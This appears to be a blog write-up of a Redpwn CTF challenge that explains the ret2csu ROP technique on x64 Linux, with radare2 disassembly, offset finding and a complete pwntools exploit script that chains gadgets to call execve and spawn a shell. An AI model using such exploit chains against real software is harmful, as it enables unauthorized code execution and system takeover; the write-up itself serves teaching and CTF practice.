ROP On x64: What's ret2csu Again?

August 29, 2019
exploiting rop radare2 r2 ctf ret2csu

Based on the Stop, ROP, n’, Roll challenge from this year’s Redpwn CTF, this post will explain how to make system calls on x64 using ROP in order to spawn a shell. Also, it shows how to abuse writable memory regions of a process to overcome difficulties with some ROP gadgets. And the best thing is, two of the gadgets used in this writeup are universal and most likely also present in your x64 target if it’s using glibc. Of course, everything will be done with radare2 and pwntools.

The challenge binary can be found here.

ret2csu Basics

The ret2csu technique, which was presented at Black Hat Asia 2018, is based on two specific ROP gadgets that are present in the __libc_csu_init() function. Let’s quote the authors of the ret2csu paper to explain why this function is even there:

The problem appears when an application is Dynamically compiled, which represents 99% of all applications. More precisely when the linker “attaches code” to the ELF executable that is not coming from the source code of the application. In other words the resulting ELF executable contains not only the compiled source code from the application but already compiled code from statically linked libraries “.a” and object files “.o” even when it is dynamically compiled.

In other words, if a binary is dynamically linked and it’s using glibc, these gadgets will be present, even if it’s only a simple Hello World application. They are handy for populating certain registers and altering the program flow. Moreover, the gadgets will always be mapped since __libc_csu_init() is executed before main(). There’s a lot more to this exploitation technique, and to fully understand it I recommend checking out the original paper linked above.

Ok So What Are Those Gadgets?

It seems that the structure of the first gadget varies depending on the compiler version. I’ve found quite a few variations of it, so it’s always worth a check. Below you can find the first gadget as found in the challenge binary:

mov rdx, r15
mov rsi, r14
mov edi, r13d
call qword [r12 + rbx*8]

And the second one is:

pop rbx
pop rbp
pop r12
pop r13
pop r14
pop r15

Cool.
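
To make the interplay of the two gadgets a bit more concrete, here is a small Python model of the register state after the pop gadget has run first and the mov/call gadget second. This is not exploit code: the function name and the dictionary layout are made up for illustration, and the example values are simply the addresses used later in this post. Only the register moves themselves are taken from the listings above.

```python
MASK32 = 0xFFFFFFFF

def model_csu_gadgets(rbx, rbp, r12, r13, r14, r15):
    """Model the register state after both gadgets have run.

    The six arguments are the values the pop gadget takes from the stack,
    in the order rbx, rbp, r12, r13, r14, r15 (rbp is not used afterwards).
    """
    return {
        "rdx": r15,                   # mov rdx, r15
        "rsi": r14,                   # mov rsi, r14
        "rdi": r13 & MASK32,          # mov edi, r13d (only the low 32 bits survive)
        "call_slot": r12 + rbx * 8,   # call qword [r12 + rbx*8] reads its target here
    }

state = model_csu_gadgets(rbx=0, rbp=0, r12=0x602000, r13=0x400c49, r14=0, r15=0)
print({name: hex(value) for name, value in state.items()})
```

Note that the first argument register only receives 32 bits, which is fine for addresses inside a non-PIE binary but would truncate a stack or libc pointer.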

Let’s analyze the challenge binary before finding a way to make use of those gadgets.

The Target

Upon executing the binary, it asks for an input:

[#] number of bytes:

The target reads this input with get_int(), which internally calls scanf() with the %zu format string, i.e. it parses an unsigned integer (size_t). Interestingly, this value is then used as the file descriptor parameter of the following read() call:

call sym.get_int # get integer, sets RAX to result value
mov qword [fildes], rax
mov rax, qword [fildes]
mov ecx, eax
lea rax, [buf]
mov edx, 0x186a0 # size
mov rsi, rax # *buf
mov edi, ecx # file descriptor
call sym.imp.read

This means that in order to input additional data via read(), the file descriptor has to be 0, which corresponds to STDIN. Since read() accepts up to 0x186a0 bytes, this call makes it possible to overflow buf, which resides at RBP - 0x9. The saved return address is reached after 17 bytes (9 bytes up to RBP plus the 8-byte saved RBP), as confirmed by passing a De Bruijn pattern generated with ragg2 -r -P 100.

First, set a breakpoint in read() at the ret instruction. Using this breakpoint it’s possible to check what’s about to be loaded into the instruction pointer:

[0x7fda3bd53338]> pxr @rsp # Check what's on the top of the stack
0x7fff9bea9518 0x4941414841414741   AGAAHAAI @rsp ascii ('A') # This will be loaded into the instruction pointer
0x7fff9bea9520 0x41414b41414a4141   AAJAAKAA ascii ('A')
[...]
[0x7fda3bd53338]> wopO 0x4941414841414741 # Search for this value in the passed pattern
17
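
The same lookup can be cross-checked by hand. The sketch below decodes the value from the stack dump into its little-endian bytes and searches for them in the start of the pattern. The pattern prefix is an assumption: it is written out the way I’d expect ragg2 to emit it, and it is consistent with the two stack words shown above. The helper name is made up.

```python
import struct

# Assumed start of the De Bruijn pattern (consistent with the stack dump above).
PATTERN_PREFIX = b"AAABAACAADAAEAAFAAGAAHAAIAAJAAKAA"

def pattern_offset(value, pattern=PATTERN_PREFIX):
    """Return the offset of a 64-bit little-endian value inside the pattern."""
    needle = struct.pack("<Q", value)
    return pattern.find(needle)

offset = pattern_offset(0x4941414841414741)
print(offset)

# Cross-check: buf sits at RBP - 0x9 and the saved RBP takes 8 more bytes.
assert offset == 0x9 + 8
```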

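Now that the instruction pointer is under control, it’s necessary to develop a plan for the exploitation. While digging around in the binary, the following things can be found:

  1. A shell path string (its address, 0x400c49, is used as BINSH in the exploit code)
  2. A syscall gadget (at 0x400703, used as SYSCALL in the exploit code)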

Combining these two aspects suggests that a shell can be spawned using a system call somehow. Therefore something like execve("/bin/sh", 0, 0) could potentially be executed.

Building The ROP Chain

The execve system call takes three parameters. This means the registers have to be set up in the following way:
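
As a sketch, the x86-64 Linux system call convention maps execve("/bin/sh", 0, 0) onto registers as shown below. The constant and function names are made up for illustration; the address of the path string is the one used in the exploit code later in this post.

```python
SYS_EXECVE = 59          # system call number of execve on x86-64 Linux
BINSH_ADDR = 0x400c49    # address of the shell path string used later in this post

def execve_registers(path_addr):
    """Register values for execve(path, NULL, NULL) via the syscall instruction."""
    return {
        "rax": SYS_EXECVE,  # system call number
        "rdi": path_addr,   # 1st argument: pointer to the path string
        "rsi": 0,           # 2nd argument: argv = NULL
        "rdx": 0,           # 3rd argument: envp = NULL
    }

for reg, value in execve_registers(BINSH_ADDR).items():
    print(f"{reg} = {value:#x}")
```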

Finding The Gadgets

Ok so what about RDX?

Unfortunately, RDX is not zero by the time the ROP chain reaches the system call, so it has to be set to zero explicitly.

Of course, the __libc_csu_init() function is also present in this x64 binary. It contains both ret2csu gadgets mentioned before:

Sure enough, the first gadget can be used to set RDX using r15, which in turn can be controlled with the second gadget.

There’s only one problem: the call qword [r12 + rbx*8] instruction at the end of the first gadget is an indirect call. It reads its target from memory at r12 + rbx*8, so it will crash unless r12 points to a location that holds a valid code address. The RBX register is zero at the point of executing this instruction, so the rbx*8 term doesn’t have to be addressed.

Dealing With The Call Instruction

Since r12 is under control using the second ret2csu gadget, we only have to find a fitting memory location to jump to that doesn’t break the program flow. It makes sense to let the call instruction jump to the syscall gadget since all registers can be set accordingly up to this point. These things are known now:

With all these things combined, a call to scanf("%zu", 0x602000) could solve this problem: it stores a number read from STDIN at the writable address 0x602000. pwntools is then used to send the address of the syscall gadget, as a decimal string since %zu parses decimal input, to the target process once the ROP chain has called scanf().
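
The idea can be modelled in a few lines of Python. This is a toy model under simplifying assumptions, not something that touches the target: memory is a plain dictionary, and the two helper functions are hypothetical stand-ins for scanf("%zu", dest) and for the indirect call at the end of the first gadget. The two addresses are the ones used in the exploit code later in this post.

```python
WRITABLE = 0x602000        # writable address used as the scanf() destination
SYSCALL_GADGET = 0x400703  # address of the syscall gadget

memory = {}  # toy model: address -> 64-bit value

def scanf_zu(dest, text):
    """Model scanf("%zu", dest): parse decimal text and store it at dest."""
    memory[dest] = int(text, 10)

def indirect_call_target(r12, rbx=0):
    """Model call qword [r12 + rbx*8]: the target is read from memory."""
    return memory[r12 + rbx * 8]

scanf_zu(WRITABLE, str(SYSCALL_GADGET))      # what the exploit sends on STDIN
print(hex(indirect_call_target(WRITABLE)))   # where the call ends up
```

With r12 pointing at the slot that scanf() filled, the indirect call lands on the syscall gadget instead of crashing.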

Getting The Syscall Number

One last thing: The execve system call itself is identified by the number 59. This number has to be loaded into RAX before jumping to the syscall gadget.

Reading a number is exactly what the application does during normal execution. It uses get_int() for this:

[0x00400600]> pdf@sym.get_int
/ (fcn) sym.get_int 43
|   sym.get_int ();
|           ; var int32_t var_8h @ rbp-0x8
|           ; CALL XREF from main @ 0x400790
|           0x00400710      55             push rbp
|           0x00400711      4889e5         mov rbp, rsp
|           0x00400714      4883ec10       sub rsp, 0x10
|           0x00400718      488d45f8       lea rax, [var_8h]
|           0x0040071c      4889c6         mov rsi, rax
|           0x0040071f      488d3d2c0500.  lea rdi, [0x00400c52]
|           0x00400726      b800000000     mov eax, 0
|           0x0040072b      e8c0feffff     call sym.imp.__isoc99_scanf
|           0x00400730      e8abfeffff     call sym.imp.getchar
|           0x00400735      488b45f8       mov rax, qword [var_8h] # RAX = Result
|           0x00400739      c9             leave
\           0x0040073a      c3             ret

The integer that’s being read is stored in RAX which is just what’s required to call execve at this point.

Ok How To Build The ROP Chain?

Like this:

  1. Write the address of the syscall gadget into the writable memory region (0x602000) with scanf().
  2. Get the execve system call number (59) into RAX with get_int().
  3. Set up the registers with the POP-gadget: Load the address of /bin//sh and the address of the writable memory region (0x602000).
  4. Execute the jump-to-syscall gadget.
  5. Have a shell.

Or in code:

from pwn import *

PADDING = 17  # offset to the saved return address

BINSH = p64(0x400c49)
SYSCALL = str(0x400703).encode()  # sent as decimal text, parsed by scanf("%zu")
JUMP_TO_SYSCALL = p64(0x00400800)
POP_RDI = p64(0x400823)
POP_RSI_r15 = p64(0x00400821)
GET_INT = p64(0x00400710)
SCANF = p64(0x004005f0)  # PLT entry of __isoc99_scanf
RET = p64(0x00400831)
POP = p64(0x0040081c)  # pop r12; pop r13; pop r14; pop r15; ret

PAYLOAD = b""
PAYLOAD += b"A" * PADDING

# Setup the parameters for scanf("%zu", 0x602000)
PAYLOAD += POP_RDI
PAYLOAD += p64(0x00400c52)  # format string for scanf()
PAYLOAD += POP_RSI_r15
PAYLOAD += p64(0x602000)  # rw region
PAYLOAD += p64(0x0) # we don't care about r15 now

# Call scanf()
PAYLOAD += SCANF

# Get the system call number of execve (59) into RAX
PAYLOAD += RET
PAYLOAD += GET_INT

PAYLOAD += POP
PAYLOAD += p64(0x602000) # r12 (for CALL in JUMP_TO_SYSCALL gadget)
PAYLOAD += BINSH # r13 (will be RDI via JUMP_TO_SYSCALL gadget)
PAYLOAD += p64(0x0) # r14 (will be RSI via JUMP_TO_SYSCALL gadget)
PAYLOAD += p64(0x0) # r15 (will be RDX via JUMP_TO_SYSCALL gadget)

PAYLOAD += RET
PAYLOAD += JUMP_TO_SYSCALL  # already packed above

Exploitation With pwntools

The exploited process reads user input four times:

  1. The file descriptor: 0 for STDIN
  2. The actual ROP payload
  3. The address of the syscall gadget via scanf()
  4. The system call number of execve via get_int()
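
Written out as raw bytes, those four inputs look roughly like this. The helper name build_inputs is hypothetical, and the 17-byte placeholder only stands in for the real ROP payload; the trailing newlines mirror what sendline() in pwntools appends.

```python
def build_inputs(payload, syscall_gadget_addr, syscall_number=59):
    """Return the four newline-terminated inputs in the order the target reads them."""
    return [
        b"0\n",                                       # 1. file descriptor for read(): STDIN
        payload + b"\n",                              # 2. raw ROP payload
        str(syscall_gadget_addr).encode() + b"\n",    # 3. decimal address for scanf("%zu")
        str(syscall_number).encode() + b"\n",         # 4. decimal number for get_int()
    ]

inputs = build_inputs(b"A" * 17, 0x400703)
for chunk in inputs:
    print(chunk)
```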

Because of this, the exploitation has to be automated with pwntools as follows:

p = process("./srnr")

p.sendline(b"0") # File descriptor: STDIN
p.sendline(PAYLOAD) # The ROP chain
p.sendline(SYSCALL) # Address of the syscall gadget
p.sendline(b"59") # System call number of execve

p.interactive()

Here’s a demo of the exploit, starting from the last ROP gadget:

ret2csu Demo

That’s it.
